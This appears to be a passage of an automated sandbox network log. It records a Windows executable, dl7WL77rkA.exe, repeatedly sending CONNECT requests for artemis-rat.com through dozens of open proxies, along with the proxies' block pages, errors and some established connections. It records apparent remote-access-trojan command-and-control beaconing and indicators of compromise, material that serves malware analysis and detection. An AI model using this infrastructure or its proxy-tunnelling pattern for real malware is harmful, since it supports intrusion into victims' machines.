                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 02:30:39 GMT</p></div></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            430192.168.2.551312104.20.22.93803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.256057024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.420612097 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            431192.168.2.55027951.89.173.40179823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.261322021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.405019999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.505913019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.599607944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.713933945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            432192.168.2.55151543.153.174.1064433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.262609959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            433192.168.2.5510005.32.88.13080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.265412092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.765400887 CET72INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            434192.168.2.551104125.122.26.24210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.265755892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            435192.168.2.551342185.162.229.112803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.278140068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.432765007 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            436192.168.2.55117046.17.63.16641543876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.278719902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.592856884 CET339INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/4.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                                                                                            X-Squid-Error: TCP_RESET 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from proxy.wakoopa.com
                                                                                                                                                                                                                                                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 72 65 73 65 74
                                                                                                                                                                                                                                                            Data Ascii: reset


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            437192.168.2.551090103.118.47.25280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.279439926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.633270025 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            438192.168.2.551184139.162.238.184298703876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.280172110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.920423985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.795486927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.635662079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124744892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            439192.168.2.551323146.190.35.6380003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.281558990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.764195919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.999608994 CET19INHTTP/1.0 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            440192.168.2.551366104.25.234.81803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.282119989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.436424017 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            441192.168.2.55113145.11.95.16550253876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.285234928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.868361950 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            442192.168.2.551248190.120.249.14941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.287277937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
443192.168.2.551137182.61.38.114823876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.291712046 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.995987892 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.320103884 CET | 295 | IN | HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 150
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
444192.168.2.551152185.38.111.180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.294555902 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.616302967 CET | 75 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Length: 0
Mar 11, 2024 03:30:39.953599930 CET | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
445192.168.2.5512195.135.83.214803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.336535931 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.657602072 CET | 327 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
446192.168.2.55120958.234.116.19781933876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.337542057 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
447192.168.2.550376201.163.73.93554433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.337666988 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.405018091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.505903006 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.599611998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:01.826464891 CET | 202 | IN | HTTP/1.0 404 Not Found
Content-Length: 717
Content-Type: text/html
Date: Wed, 06 Mar 2024 01:53:09 GMT
Expires: Wed, 06 Mar 2024 01:53:09 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
448192.168.2.550190142.54.235.941453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.337794065 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
449192.168.2.551160206.189.145.23636253876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.340781927 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
450192.168.2.55126972.206.181.97649433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.340903044 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
451192.168.2.55128920.210.113.32803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.342283964 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.613401890 CET | 319 | IN | HTTP/1.1 403 Forbidden
Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            452192.168.2.55122195.140.124.16110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.343897104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            453192.168.2.551265211.222.252.187803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.345412970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.644738913 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            454192.168.2.55036372.210.252.13741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.347037077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            455192.168.2.551437104.19.120.84803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.366904020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
